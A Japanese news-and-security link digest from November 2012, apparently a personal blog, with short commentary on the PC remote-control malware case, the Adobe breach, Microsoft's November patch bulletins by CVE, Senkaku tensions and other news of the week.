中国公船、日中合意に反する調査実施か 海保航空機が確認 (産経, 11/15)。中国海洋調査船「科学」。
10月の訪日中国人は33%減 尖閣諸島の対立が影響 (産経, 11/16)。2010 年 10 月比。
中国船4隻 接続水域で航行続ける (NHK, 11/16)
尖閣周辺EEZにバハマ船籍の船 海洋調査か (日経, 11/16)、 尖閣周辺、中国船28日連続航行 バハマ船も、海洋調査か (東京, 11/16)。DISCOVERER2。
中国が大型監視船投入へ 日本に圧力 (NHK, 11/16)。3000トン級海洋監視船「海監137」。
》 解散・総選挙 JA会長 「TPP反対の候補者を推薦する」 (田中龍作ジャーナル, 11/15)
》 ドメル将軍の自爆攻撃で壊れなかったヤマトとは? (4) (マジン・ゴー!な日々, 2011.11.20)。なるほど、そうだったのか!
》 内紛に明け暮れ官僚支配を強化させ 民主党政権が終わった日 (田中龍作ジャーナル, 11/16)
》 隠し撮り 警察官2人停職処分 (NHK, 11/16)。また神奈川県警か……。
巡査の自宅からは数十件の動画が見つかったということで、調べに対して「盗撮する際のどきどきした気持ちを味わいたかった。大学生のころからやっていた」と供述しているということです。
盗撮しながら警官になるなよ……。
》 FFRI、ネットバンキング中のパスワード詐取や通信改ざんを防ぐセキュリティ対策ソフトを発売 (日経 IT Pro, 11/16)。FFRI Limosa。 関連:
2012-11-13 インターネットバンキングを狙った攻撃について (FFRI BLOG, 11/13)
》 太陽光発電、2年前の半額以下で設置可能に 設置コスト削減、適地確保で進化する (日経ビジネス, 11/15)。導入・設置コストが大幅に低下している。
太陽光発電における「イノベーション」と言うと、変換効率何%という話と考え勝ちだが、それだけではない。むしろ、架台や工事方法、それから、営業の効率化などの方が短期的にはインパクトは大きい。このようなイノベーションと買い取り制度のお陰で太陽光発電は主役の座を目指して本格普及期に入った。
》 コンゴ民主共和国で恣意的な殺害横行 (国連情報誌SUNブログ対応版, 11/15)
》 ナベツネ不法免許取得疑惑 続報 実行犯自供テープ内容 (老害ニュース, 11/15)
》 遠隔操作マルウェア等を用いた連続犯行予告事件。 前ねた。
襲撃予告の真犯人は保土ケ谷? 「パソコン持ってますか」 聞き込みに回る捜査員 (産経 MSN, 11/14)。EXIF データとは違う場所を調べる人々。
遠隔操作ウイルスはツールで簡単に作成可能、マカフィーが報道陣向け体験会 (Internet Watch, 11/15)。 こういう生成ツールを使うのが一般的なわけですが、今回の事例はスクラッチっぽい。
PC遠隔操作ウイルス事件が社会に突きつけた「課題」【第3回】 企業のIT管理者が行うべき対策とは (ComputerWorld.jp, 11/14)
PC遠隔操作:誤認逮捕男性拘束で補償決定 家裁浜松支部 (毎日, 11/16)
》 キンドルが売れないこれだけの理由 (東洋経済オンライン / Yahoo, 11/15)
アマゾンは、当初、日本の大手出版社と交渉すれば、タイトル数は集まると考えていたようだ。アマゾンの契約書は、電子書籍の「送信可能化権」を「出版社がアマゾンに許諾する」という内容になっていたからだ。
しかし、日本の著作権法では、この送信可能化権を出版社は持っていないのである。
アメリカの場合、出版社は紙も電子も含めて、著者とは包括的な契約(エージェント契約)をしているので、アマゾンは出版社とだけ契約すればよかった。ところが、日本の出版社は著作者から権利使用の「許諾」を受けているに過ぎず、著作者の了解を得ずに配信業者であるアマゾンに電子書籍のデータを渡せない。
さらに、電子書籍は定価販売が義務付けられた再販価格維持商品ではない。よって、卸売側の出版社が価格を決めると独禁法違反になるので、アマゾンは、英米流(欧米流ではない)の小売り側が価格を設定できるホールセールモデルを日本でも導入できると考えていた。
だが、日本の有力出版社は、この点だけは譲らなかった。価格決定権を失えば、電子出版市場の拡大とともに、紙での収益が決定的に激減するからだ。楽天はこの点を理解し、出版社側に価格決定権があるエージェンシーモデルで契約した。その結果、アマゾンもエージェンシーモデルでの契約に追随せざるをえなくなったのだ。
こうして、一部のコンテンツをのぞいて小売価格をアマゾンが決めることができなくなった。アメリカでキンドルが売れたのは、なによりも電子版が紙版(ハードカバー)より圧倒的に安かったからだ。25ドル以上するハードカバーが9.99ドルまでに値下げされた。これが、日本では起こらないことになった。
》 ハッカーがAdobeから顧客情報やパスワードなど15万件を盗んだことを公開 (gigazine, 11/15)。関連:
Adobe confirms customer data breach - Update (H Security, 11/15)
Cracked passwords from the alleged 'Egyptian hacker' Adobe breach (Sophos, 11/15)。その内容がひどいという話。
Connectusers.com Forum Outage Following Database Compromise (Adobe, 11/14)
アドビ、ハッカーによる“顧客情報漏洩”の主張に調査を開始 (ComputerWorld.jp, 11/16)
Pastebinサイトで公開された情報は、Adobeもしくは米国政府機関、米軍の関係者と思われるメール・アドレス(ドメイン末尾が「adobe.com」「.mil」「.gov」のもの)のみ。
230件の情報には、氏名、肩書き、所属組織、メール・アドレス、ユーザー名、暗号化済みパスワードが含まれる。所属組織欄には、運輸省、国土安全保障省、国務省、連邦航空局など、さまざまな米国政府および各州政府の機関が並んでいる。
》 IANAへのIPv4アドレス返却 (Geek なぺーじ, 11/14)
》 Internet Infrastructure Review (IIR) Vol.17 (IIJ, 11/13)
》 Windows 8 でもランサムウェアの影響は不可避 (シマンテック, 11/13)
万一ランサムウェアに感染してしまった場合でも、けっして身代金は支払わないでください。代わりに、シマンテックが提供している駆除手順に従うか、こちらのビデオ(英語)でさらに詳しい手順を参照してください。
》 ドラえもんがいない世界でのび太は誰と組むべきか (海国防衛ジャーナル, 11/9)
二国間同盟、多国間同盟、バンドワゴニング、宥和…、どれものび太にとって決して楽観的な選択ではありませんね。ドラえもんがいないと、のび太の日常は一気にプレイ難度が上がります。それほどドラえもんと同盟を組んでいる現状は恵まれているということです。
同盟は結びたいときに結びたい相手と都合よく結べるものではありません。のび太はドラえもんの有難味をもっと理解しろ!と、子供のころから感じていましたが、大人になった今ではより一層その気持ちが強くなりますね。
》 第七艦隊は核兵器をもっていません (海国防衛ジャーナル, 11/11)
橋下市長はおそらく核ミサイルを搭載したSSBNが日本に入港することを想定しておられると察しますが、初歩的なアメリカの核戦略態勢も理解しないまま「SSBN+SLBMを持ち込め!」と言うような具合では、とても防衛問題を担う国政レベルの議論はできないのではないでしょうか。
橋下市長は防衛問題の専門家をブレーンに招くことをお勧めします。
》 ビル・ゲイツは泣いて馬謖を斬ったのか (ZDNet, 11/15)。スティーブン・シノフスキー話つづき。
スウィシャーはマイクロソフト社内の複数の情報源から聞いた話として、協調性を欠き、上級幹部と角を突き合わせることも少なくなかったシノフスキーのやり方に、「バルマーが遅まきながら懸念を抱くようになった」と記している。
この「遅まきながら」という部分に関しては具体的な時期についての言及はないが、メディアへの露出度が高かった複数の上級幹部が一斉に辞めていった2010年あたりの可能性が高そうだ。(中略) 特にXboxの二人がエンターテイメント部門で開発していた幻のタブレット「Microsoft Courier」は、シノフスキーにつぶされたとされている。
Microsoft Courier については、たとえば マイクロソフトの2画面タブレット Courier 詳細判明&UI 動画 (engadget, 2010.03.05) を。今見てもおもしろそうなのにね。
》 「孫崎享著『戦後史の正体』は陰謀史観」書評の一部削除 (日本報道検証機構, 10/21)。朝日の例のアレ。
》 「山梨大 4年後ほぼ全講義英語化」の事実なし (日本報道検証機構, 11/14)。読売報道。
》 「情報セキュリティ実践トレーニング 2013 Winter」の受講者を募集中! (Eiji James Yoshidaの記録, 11/14)。「今回もインシデント調査トレーニングとなります」。2013.01.19〜26。
》 平成24年度「企業が反社会的勢力による被害を防止するための指針」に関するアンケート (調査結果) (警察庁, 11/15) (typo fixed: 杜選な研究者クリスマスさん感謝)
》 マカフィー VirusScan Enterprise 方面
スキャンエンジン 5600 が 2013.06 に自動更新で配布される予定だそうです。 それはいいのですが、VSE 8.7i では、あらかじめ patch 5 + Hotfix 777352 にしておかないとうまく動かない模様です。
VirusScan Enterprise 8.7i Patch 5 での 5600 アンチマルウェアエンジンのサポートについて (マカフィー, 11/13)
5600 アンチマルウェアエンジンは新しいデジタル証明書で署名されているため、VSE 8.7i では自動的に信頼済みとして認識されません。マカフィーでは VSE 8.7i 上で信頼済みとして認識されるよう、デジタル証明書情報を更新する Hotfix 777352 をリリースしました。
証明書更新用の Hotfix ですか。
Important information about the 5.x.00 Anti-Virus Scanning Engine (McAfee KB66741)。5600 エンジンのリリーススケジュール。 2013.03 にダウンロード可能となり、 2013.06 に自動更新で配布。 5400 エンジンは 2013.09 に EOL。 なお 5500 エンジンは開発に失敗し廃番となりました。
KB66741 にはエンジン更新を拒否する設定方法もまとめられています。が、上記のとおり 5400 エンジンは 2013.09 に EOL なので、設定する際はご注意を。
VirusScan Enterprise 8.8 support for Microsoft Windows 8 and Windows Server 2012 (McAfee KB74593)。正式対応は VSE 8.8 Patch 3 以降なのですが、今スグ必要な場合は Patch 2 を。その場合、Patch 3 が出たらスグに適用してね。
Patch 2 has not been fully certified by McAfee, but is compatible with Windows 8 / Server 2012.
VirusScan Enterprise Hot Topics (McAfee KB65944)。VSE 8.8 Patch 3 は 2012.11 の first half of month って書かれてるけど、まだダウンロードできない。
VirusScan Enterprise 8.8 Patch 2 Hotfix 778101 Release Notes (McAfee KB76727)。High Priority レイティングの Hotfix。 このページからしかダウンロードできないみたい。 レイティングについてはこちら: Service Packs, patches, hotfixes, maintenance releases, and patch release cycle (McAfee KB51560)。
》 『ブレイブリーデフォルトプレイングブレージュ』内部データまる見え事件。なかむらさん情報ありがとうございます。
スクエニ新ブラゲ「ブレイブリーデフォルト」のデータ全漏れでユーザーからの信頼度がデフォルトに (やまもといちろう Blog, 11/15)
一番の問題は、ガチャで「有料ガチャを回しても出ない時間帯が設定することができ、実際にそのように設定されている」ことが明らかになってしまったことです。これは有償によるガチャに対して出玉、すなわち当たり確率を変更する仕様が入っていることを意味し、基本的には一般社団法人ソーシャルゲーム協会やオンラインゲーム協会の示したガイドラインに抵触すると言われてもおかしくない内容と言えます。
スクエニの新作ブラウザゲー『ブレイブリーデフォルトプレイングブレージュ』で内部データ流出…ガチャのオンオフ設定発覚で課金者発狂 (カジ速, 11/15)
21 :以下、名無しにかわりましてVIPがお送りします :2012/11/15(木) 15:19:54.18 ID:5hRKERoC0
データ流出で、今あるジョブよりキャラクターの成長率が良い上位職がある事も判明した
それらには☆がつく 戦士☆ 戦士☆☆など もちろん出るのはgold_gacha(笑)
これらのジョブをつけると成長率がよくなるため、今までガチャで出して育てたキャラクター達が産廃となり
そうすると1500円を払って一回限りのリセットをしなければならない
1キャラクターには一度しかリセットを使えないため、レアキャラクターが良い成長をしなければ、またガチャから手に入れるしかない
しかも驚いた事にこのゲーム未だオープンβであるのだが、すでに課金を始めており、
半額キャンペーン! 期間限定! 今ならメダルもつく!等のガチャキャンペーンまで行っている
一人につきたった5回の戦闘でスタミナが尽きるシステム、専用モーションやエフェクトも無いにただ武器振ってダメージが出るだけのスキル
キツキツに縛られたレベル上限、つまらない戦争、ガチャしかやる事がないなど
はっきりいって原作のブレイブリーデフォルトFFに泥を塗っただけのゴミである
モチベ下がらない人はすごいね (heko1967のブログ, 11/16)
流出データ見ましたが、これを見てモチベーションが下がらない人は尊敬できます
要約すると
「今あるアスタリスクはゴミになります」
「不思議なインクは一度しか使えないので、これを使用したキャラはいずれゴミになります」
「今後現在のキャラのちょっと変化しただけの実質使いまわしキャラが出ます」
こんなとこかな?
ガチャのon/offはいろいろ解釈があり誤解してコメントしてる方もいるみたいなのでカットします
ようするに今育てても、そのうち無駄になるって言われたようなもの
巫女とか引いた人はいつ育てるのかな?
育てる→新しいアスタ出る→不思議なインクでリセット→新しいアスタ出る→ゴミ
こうなるのが分かってる状態だといつ育てていいのやら・・
プロデューサーからのお知らせ (SQUARE ENIX, 11/15)
Alleged security hole in CryENGINE 3 game engine (H Security, 2012.11.15)
JVNDB-2012-000102: Android OS を搭載した複数の端末におけるサービス運用妨害 (DoS) の脆弱性 (JVN, 2012.11.14)、 複数の Android 端末におけるサービス運用妨害 (DoS) の脆弱性 (FFRI, 2012.11.14)。報告されたのは 2011.06.10 (去年だ!)。
この脆弱性は、経済産業省委託の平成23年度企業・個人の情報セキュリティ対策促進事業(新世代情報セキュリティ研究開発事業)にて発見されました。
JVNDB-2012-005363: Dell OpenManage Server Administrator にクロスサイトスクリプティングの脆弱性 (JVN, 2012.11.16)。patch あり。 CVE-2012-4955
JVNDB-2012-000103: Android 版 Monacaデバッガーにおける情報管理不備の脆弱性 (JVN, 2012.11.16)。最新版で修正済。 CVE-2012-5172
》 NTTドコモで11月14日発生したspモードの通信障害、影響数は最大270万人 (日経 IT Pro, 11/15)。「設定漏れ」による不具合。
》 イスラエル軍が公式Twitterでガザ地区攻撃をライブツイート (ITmedia, 11/15)。プロパガンダ。関連:
ガザ攻撃、ハマス幹部を殺害 イスラエル軍、報復必至 (東京, 11/15)。「ハマス軍事部門トップのアハメド・ジャバリ氏」
ガザ攻撃の死者10人に イスラエルが続行 (東京, 11/15)。「死者には子供や妊婦も含まれている」
BBC Arabic journalist Omar Jihad mourns the death of his 11 months old son after Israeli air strikes. #Gaza #Israel pic.twitter.com/2e5CRcc8 (@TheMiinz, 11/15)。イスラエルの空爆により、BBC の記者 Omar Jihad の 11 か月の赤ちゃんが殺された。
》 Japan Aims To Launch F-3 Development In 2016-17 (Aviation Week, 10/22)。名古屋からこんにちわな記事。 とりあえず言ってみるだけならタダだからなあ。
関連: 航空機ニュース Vol.152 『「日本F-3戦闘機 開発へ」報道について』 (martyakunの耳はロバの耳, 10/25)。
》 実践 パケット解析 第2版——Wiresharkを使ったトラブルシューティング (オライリージャパン)、Internet Week 2012 で買おうかと思っていたら、献本いただいてしまった (ありがとうございます)。仕方ないから、IW2012 では表紙がかわいすぎて卑怯な本でも買うかなあ。 (表紙、原書と違いすぎる)
》 エヌフォーの辞書アプリ、海賊版を誤検出して Twitter に誤爆
アカウントを乗っ取って「懺悔」をツイートする辞書アプリ(WIRED.jp) (日経 IT Pro, 11/15)
弊社iOS向け辞書アプリ製品の重大な不具合の修正について (エヌフォー, 11/5)、 Anti-piracy bug "Open Apology Letter" (Enfour, 11/14)
iOS dictionary apps posting false piracy "confessions" onto users' Twitter accounts (Sophos, 11/14)
正規ユーザを泥棒呼ばわり iOSアプリの海賊版対策として仕込んだ懺悔ツイート機能が暴走 (I believe in technology, 11/15)
》 Win32/Morto - Made in China, now with PE file infection (ESET Threat Blog, 11/14)
The dark blue color indicates a high proportion of detections while light yellow shows a small proportion of detections. The map shows a significant number of detections through Asia, including Mongolia, Tajikistan, Uzbekistan and China.
え? 添付されている地図では、ウズベキスタンは黄色じゃん……。 キルギスと間違えてる? オマーンや UAE、イランも色が濃いなあ。
》 IEAK 10 for Windows 8 now available (IEBlog, 11/14)
》 LED電球、どれを買う? 日立「小形電球形(E17口金)広配光タイプ LDA7L-G-E17/S」 〜E17口金用の大本命。光が広がり設置場所を選ばず (家電 Watch, 11/15)。おぉ、ついに E17 口金・40W 相当・全方向な品が登場。 これを待っていた。 (60W 相当品も待ってるよ!)
2012-11-13 Adobe Reader のサンドボックス機構を迂回するゼロデイ脆弱性 (FFRI BLOG, 2012.11.13)
Skype のパスワードリセットプロセスに欠陥、ユーザー名と電子メールアドレスを知っているだけでアカウントを乗っとれる。
Security hole allows anyone to hijack your Skype account using only your email address (updated) (the next web, 2012.11.14)
Skype investigating account theft vulnerability - Update 2 (H Security, 2012.11.14)
Skype vulnerability makes hijack child’s play. (trendmicro, 2012.11.14)
この欠陥は現在は修正されている。
》 視点・論点 「実践に根ざした倫理を」 (日本臨床倫理学会 理事長 新田國夫, 11/9)
》 楽天カードが「暗証番号照会」サービスを開始して、解約を検討する人が続出中 (NAVER まとめ, 11/14 更新) (魚拓 page1)
》 なぜバイアグラの特許は無効になったのか? (栗原潔のIT弁理士日記, 11/10)。カナダでのお話。
》 宇宙戦艦ヤマト、建造開始「410日前」に工事着手が必要と判明 (前田建設, 11/9)。工費1207億3816万円だそうで。意外と安いなあ。 あくまで「ヤマトの建造準備及び発進準備工事」だけだけどね。
》 New variant of Mac Trojan discovered, targeting Tibet (Sophos, 11/13)
》 本当のチベットの姿を考えてみてください なぜ抗議の焼身自殺が後を絶たないのか (日経ビジネス, 11/14)、 チベット族の焼身自殺続発 中国、沈静化に躍起 (東京, 11/11)
》 陸山会事件の構図自体を否定した控訴審判決とマスコミ・指定弁護士・小沢氏の対応 (郷原信郎が斬る, 11/14)
関連: <陸山会事件>小沢氏、2審も無罪…東京高裁判決 (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/12)
》 An IPv6 readiness update is available for Windows 7 and for Windows Server 2008 R2 (Microsoft KB 2750841)。これを適用すると PowerDNS で不具合が出るようで。
OpenDNS services: "Additional log on information may be required" pop up warning issue (OpenDNS)。 Item_8 で EnableActiveProbing キーを無効にする回避策が紹介されている。
揺らぐイラン:制裁下の市民は/1 広がる格差 働く子供急増、高級外車は販売好調 (毎日, 11/11)
揺らぐイラン:制裁下の市民は/2 苦悩する若者たち 高い失業率/大学で麻薬流行 (毎日, 11/13)
揺らぐイラン:制裁下の市民は/3 アフガン難民「苦渋の選択」 保護に陰り (毎日, 11/14)
》 パロマレス事件 (1966年) による環境汚染、なおも継続中
パロマレス米軍機墜落事故 (ウィキペディア)。B-52 と KC-135A が空中衝突、水爆 4 個が落下。3 個がパロマレスに落下し、2 個からウランとプルトニウムが飛散。
スペイン:66年米軍機事故で水爆落下、土壌放置進む汚染 (毎日, 11/13)
スペイン:汚染土壌、核配備優先し隠蔽…米軍機の水爆落下 (毎日, 11/13)
スペイン:66年米軍機事故で水爆落下、土壌放置進む汚染 (毎日, 11/13)
》 週刊(だったはずの)有料メルマガが一ヶ月間配信されなかった件 (Film Goes with Net, 11/13)
コンテンツ作るのって大変です。お金払わなきゃいいコンテンツを享受できないと思います。cakesの加藤さんは、本気のコンテンツは無料のサイトには載らないと云います。そうかもしれません。
でも有料のコンテンツを購読してもコンテンツ自体が期日通りに届きません。下手すると一ヶ月も放置されます。
どこの泡沫メルマガかと思ったら、家入一真、やまもといちろう、津田大介だった。
》 Linux Security Modules に変化の兆しが出てきました。 (熊猫さくらのブログ, 11/11)
》 インドとロシア:原発計画巡り関係悪化 賠償責任で対立 (毎日, 11/14)。クダンクラム原発3、4号機。
落合洋司弁護士などに、自殺をほのめかすメール
【速報】落合氏、他数名に「真犯人」からのメールが届く? (togetter, 11/13)
真犯人から今度は自殺予告メール (Satoru.net, 11/14)。メール全文と添付されていた写真、 写真の EXIF データ。「35° 45' 21.6" N」「139° 58' 45.6" E」だそうで。千葉県。
おひさしぶりです。真犯人です。
ミスしました。ゲームは私の負けのようです。
捕まるのが厭なので今から首吊り自殺します。
楽しいゲームでした。
さようなら。また来世ーーー
今のところ、当該の場所で首吊り死体が発見された、といったニュースは聞こえてこない。
PC遠隔操作「真犯人」からメール届く 「ミスしました。ゲームは私の負けのようです」 (ITmedia, 11/14)
緯度・経度を表記する場合、一般には60進数である度・分・秒の表記が使われています。一方、Googleマップは経度・緯度を百分率で表示しており、度・分・秒の緯度・経度表記を、百分率に換算せずにGoogleマップに字面通りに入力すると別の場所が表示されます。(中略) Googleマップで誤って表示させた横浜市の地点は、神奈川県警が大学生を誤認逮捕した事件で犯行予告の対象となった学校が近くにあるなど、関連性を疑わせる場所になっており、画像内の新聞も神奈川県内であることをほのめかすものです。各紙の報道によると、警察は同地点で聞き込みなどを進めているとのことです。
PC遠隔操作:「真犯人」自殺予告メール 弁護士などへ (毎日, 11/14)
PC遠隔操作:匿名化ソフト使用 「自殺予告」メール (毎日, 11/14)
PC遠隔操作:「私の負け」真意つかめぬ捜査幹部 (毎日, 11/14)
遠隔操作ウイルスによる犯罪予告事件で電波が発信されたとみられる現場付近のマンションで聞き込みをする捜査員ら=横浜市保土ヶ谷区で2012年11月14日午前7時8分、木葉健二撮影
「電波が発信された」? 横浜?
真犯人 捜査のかく乱狙いか (NHK, 11/14)
合同捜査本部は、写真にあるデータから横浜市保土ケ谷区の団地付近で撮影された可能性があるとみて、14日朝から聞き込み捜査を行いましたが、真犯人の存在をうかがわせる情報はなかったということです。
EXIF が示しているのは千葉なのに……。 警察からの情報を検証せずにタレ流すのはいいかげんやめようよ。
犯人は位置情報の度分秒と百分率の区別を知らなかった? 35 deg 45' 21.60" N, 139 deg 58' 45.60" E = 35.756, 139.979333 (千葉県鎌ケ谷市)間違って、35.452160, 139.584560 と扱うと保土ヶ谷市の団地。 (Hiromitsu Takagi, 11/14)
実はこれが犯人による仕込みで (中略) へ行ってみると、「ようこそ、バーボンハウスへ。位置情報の読み方は理解できたかな?」とか紙が置いてあったりして。 (Hiromitsu Takagi, 11/14)
住所を意図的に読み間違えるようにした?遠隔操作ウィルス作者からのメール釣りの可能性(高木浩光氏) (togetter, 11/14)
ミスというのはこの件なんですかね: 「真犯人」1度だけミス? 匿名化せず書き込みか 警視庁注目 (産経, 11/10)
遠隔操作ウイルスの問題について (Security, time after time, 11/13)
》 その男、スティーブン・シノフスキー (Windows & Windows Live 担当プレジデント→退社)
マイクロソフト コーポレーション(米国本社)役員 スティーブン シノフスキー (Microsoft)。まだ残ってた。
MS、「Windows」担当幹部S・シノフスキー氏の退職を発表 (CNET, 11/13)
シノフスキーとフォーストル--有能で野心的な親衛隊長の悲劇 (ZDNet, 11/13)
マイクロソフトのシノフスキー氏が退社、Windows 担当プレジデント (engadget, 11/13)
Windows 8総責任者が辞任。マイクロソフトに今、何が起きているのか (Yahoo, 11/14)
10月26日、シノフスキーは上機嫌だった。(中略) ところが、週末を挟んで翌週、30日になると表情だけでなく、喋る様子そのものが大きく変わっていた。(中略) この間に何かがあったと考えられる。
》 日本マイクロソフト、Windows RTの概要や互換性などを解説〜Xbox SmartGlassもデモ (PC Watch, 11/13)
質疑応答では、国内での「Surface」投入について、クルトワ氏が「日本はSurfaceにとって重要な市場であり、時期は言えないが、日本にも投入予定である」と答えた。
とりあえず何もしない。
Windows RTは、ARM版Windows 8と言える存在。薄型軽量で、長時間のバッテリ駆動が特徴だが、同社業務執行役員Windows本部本部長の藤本恭史氏によると、Intelプロセッサでも低消費電力なものが登場している現在では、この点においてWindows RTマシンとWindows 8マシンで劇的な差はないという。
体感性能の違い (Surface のサクサク感) については全く語っていないというのがミソだな。
》 サービス開始から10年、2012年のセカンドライフはすごかった ほか (やじうまWatch, 11/13)。というか、まだあったのか。
Oracle Java SE Critical Patch Update Advisory - October 2012
関連:
2012年10月公開の Java SE の脆弱性を狙う攻撃に関する注意喚起 (JPCERT/CC, 2012.11.14)
Oracle Java SE JREのJAX-WSクラスの脆弱性により、任意のコードが実行される脆弱性(CVE-2012-5076)に関する検証レポート (NTTデータ先端技術株式会社, 2012.11.14)
.NET Framework が含まれてて、適用には時間がかかるので注意。 Mac 用 Office の更新もあり。
MS12-071 - 緊急: Internet Explorer 用の累積的なセキュリティ更新プログラム (2761451)
IE 9 のみに 3 つの欠陥。 いずれも攻略 Web ページによって任意のコードを実行できる。 いずれも Exploitability Index: 1
CFormElement の解放後使用の脆弱性 - CVE-2012-1538
CTreePos の解放後使用の脆弱性 - CVE-2012-1539
CTreeNode の解放後使用の脆弱性 - CVE-2012-4775
Windows XP / Server 2003 / Vista / Server 2008 / 7 / Server 2008 R2 / 8 / Server 2012 の Windows エクスプローラーに 2 件の欠陥。いずれも攻略ブリーフケースによって任意のコードを実行できる。いずれも Exploitability Index: 1
Windows ブリーフケースの整数アンダーフローの脆弱性 - CVE-2012-1527
Windows ブリーフケースの整数オーバーフローの脆弱性 - CVE-2012-1528
MS12-073 - 警告: Microsoft インターネット インフォメーション サービス (IIS) の脆弱性により、情報漏えいが起こる (2733829)
IIS 7.0 / 7.5 に 2 つの欠陥。Exploitability Index: N/A
パスワード漏えいの脆弱性 - CVE-2012-2531
ログファイルのアクセス許可が不適切なために、local user がログファイルにアクセスし、そこに記されたユーザー名やパスワードを発見できる。
FTP コマンド インジェクションの脆弱性 - CVE-2012-2532
IIS の FTP Service に欠陥があり、「セッションをトランスポート層セキュリティ (TLS) に切り替える前に、FTP コマンドの限定されたセットを実行できる可能性があります」。
MS12-074 - 緊急: .NET Framework の脆弱性により、リモートでコードが実行される (2745030)
.NET Framework 1.0 SP3 / 1.1 SP1 / 2.0 SP2 / 3.5 / 3.5.1 / 4 / 4.5 に 5 つの欠陥。
リフレクションをバイパスする脆弱性- CVE-2012-1895
Exploitability Index: 1
セキュリティ情報を漏えいするコード アクセスの脆弱性 - CVE-2012-1896
Exploitability Index: 3
.NET Framework の安全でないライブラリのロードの脆弱性 - CVE-2012-2519
Exploitability Index: 1
Web プロキシ自動発見 (WPAD) の脆弱性 - CVE-2012-4776
Exploitability Index: 1。 関連: MS12-074: Addressing a vulnerability in WPAD’s PAC file handling (Microsoft Security Research & Defense, 2012.11.13)
WPF 反映最適化の脆弱性 - CVE-2012-4777
Exploitability Index: 1
MS12-075 - 緊急: Windows カーネルモード ドライバーの脆弱性により、リモートでコードが実行される (2761226)
Windows XP / Server 2003 / Vista / Server 2008 / 7 / Server 2008 R2 / 8 / Server 2012 に 3 つの欠陥。local user による権限上昇が可能。
Win32k の解放後使用の脆弱性 - CVE-2012-2530
Exploitability Index: 1
Win32k の解放後使用の脆弱性 - CVE-2012-2553
Exploitability Index: 1
TrueType フォントの解析の脆弱性 - CVE-2012-2897
Exploitability Index: 2
MS12-076 - 重要: Microsoft Excel の脆弱性により、リモートでコードが実行される (2720184)
Excel 2003 / 2007 / 2010、Office 2008 for Mac、Office for Mac 2011、Excel Viewer、Office 互換機能パック Service Pack [23] に 4 つの欠陥。 いずれも攻略 Excel ファイルによって任意のコードを実行できる。いずれも Exploitability Index: 1
Excel SerAuxErrBar のヒープ オーバーフローの脆弱性 - CVE-2012-1885
Excel のメモリ破損の脆弱性 - CVE-2012-1886
Excel SST の解放後の無効な長さの使用の脆弱性 - CVE-2012-1887
Excel のスタック オーバーフローの脆弱性 - CVE-2012-2543
関連:
2012 年 11 月のセキュリティ情報 (月例) - MS12-071 〜 MS12-076 (日本のセキュリティチーム, 2012.11.14)
2012年 11 月のマイクロソフトワンポイントセキュリティ〜ビデオで簡単に解説〜 (日本のセキュリティチーム, 2012.11.14)
Assessing risk for the November 2012 security updates (Microsoft Security Research & Defense, 2012.11.13)
マイクロソフト月例パッチ(Microsoft Patch Tuesday)- 2012 年 11 月 (シマンテック, 2012.11.14)
楽天koboのログイン画面にも「パスワードの表示」ボタンがついた (ockeghemのtumblr, 11/10)
IE10にはパスワード表示ボタンが付いている (ockeghemのtumblr, 11/12)
》 Outlook の動作履歴について (Office365, 11/12)
》 Detecting CSRF vulnerabilities: Vulnerability scanning with the OWASP CSRFTester (H Security, 11/7)。 OWASP CSRFTester
》 シマンテック、国内にセキュリティ監視センターを開設 日本語でのインシデント報告が可能に、国内特有の脅威にも迅速に対応 (日経 IT Pro, 11/13)。東京 SOC だそうです。
》 PS3での不正ソフトウェア使用停止をSCEが勧告、暗号鍵流出の影響か (gigazine, 11/13)
》 地デジ著作権を侵害 大町署など 容疑の男逮捕 (信濃毎日, 11/13)。「地デジコピーガード(CPRM)解除プログラム」
》 2013 年のセキュリティに関する 5 大予測 (シマンテック, 11/11)。もうそんな季節。
》 実践 パケット解析 第2版——Wiresharkを使ったトラブルシューティング (オライリージャパン, 11/17)。 IW2012 に行ったときに買うかなあ。
》 海遊館にて同伴者へのメッセージをダイバーに持たせてサプライズで伝える「アクアメッセージ」で愛を伝えた瞬間を集めたムービー (gigazine, 11/13)
》 水深3300メートルの海底からとんでもない形をした新種の肉食生物が発見される (痛いニュース, 11/10)。視覚が生じるまでは、浅海域でもこんな変なのがどっさりいたのだろうなあ。視覚が生じると、こんなあからさまな連中は淘汰されただろうけど、深海域にはまだいると。
》 レコーダーの私的録画補償金収入、デジタル移行でゼロに? 半年で1万579円
録画機器に対する補償金は、2011年度上期の出荷分に対しては4億2628万644円あったのに対し、下期出荷分ではわずか1万579円だった(いずれもSARVHの2012年度の収入となる受領額)。
さらに、今回の最高裁決定によりデジタル専用録画機器が補償金の対象外とされたことで、それらの機器で使用する記録媒体のほうの補償金も徴収できなくなり、ゼロになるものとSARVHではみている。
おめでとうございます。
》 その男、デイヴィッド・ペトレイアス (前 CIA 長官、元イラク駐留米軍司令官、元アフガン駐留米軍司令官)
米CIA長官:不倫で辞任 機密漏えいか FBI捜査 (毎日, 11/10)
米NBCテレビなどによると、不倫相手はペトレアス氏がアフガン駐留米軍司令官時代に同氏の伝記を執筆した既婚の女性ジャーナリスト。ウェストポイント陸軍士官学校出身で、軍や安全保障政策に詳しいという。ペトレアス氏はCIA長官就任後もこの女性に数千通ものメールを送っていたとの報道がある。FBIは、こうしたメールを理由に機密漏えいを強要される可能性があることなどから捜査を開始したという。両者の間で交わされたメールなどを捜査している。伝記は「ALL IN」というタイトルで、今年1月に出版された。
CIA長官が不倫で辞任 米軍の「英雄」政権に打撃 (産経, 11/10)
「彼から手を引いて!」 CIA長官不倫相手が別女性脅迫、全米騒然 (産経, 11/13)
今回の不倫問題で現時点では、外部への情報漏洩(ろうえい)は確認されていないという。しかし、米ニュースサイト、デイリー・ビーストは、ブロードウェルさんが先月(10月)26日にコロラド州のデンバー大学で行った米中枢同時多発テロ(9・11)に関する講演会で、9月に起きたリビア東部ベンガジの米領事館襲撃事件の実行犯は現地のCIAの別館に捕えられていたリビア民兵だったと発言したと伝えた。この情報は公になっておらず、CIAは情報を否定したという。
ペトレイアス氏がブロードウェルさんに機密情報を漏らしていたことが発覚すれば、問題は辞任だけでは決着せず、スキャンダルがさらに燃え広がるのは必至だ。
ペトレアス米CIA長官、不倫を理由に辞任 (AFPBB, 11/10)
ペトレアス前CIA長官の不倫、脅迫メールの捜査で発覚 (AFPBB, 11/12)
デヴィッド・ペトレイアス (ウィキペディア)
次の大統領にはペトレアス将軍を (CNN, 2010.04.06)
アフガニスタン:民兵組織と地元警察(ALP)の人権侵害 野放しやめよ (ヒューマン・ライツ・ウォッチ, 2011.09.12)
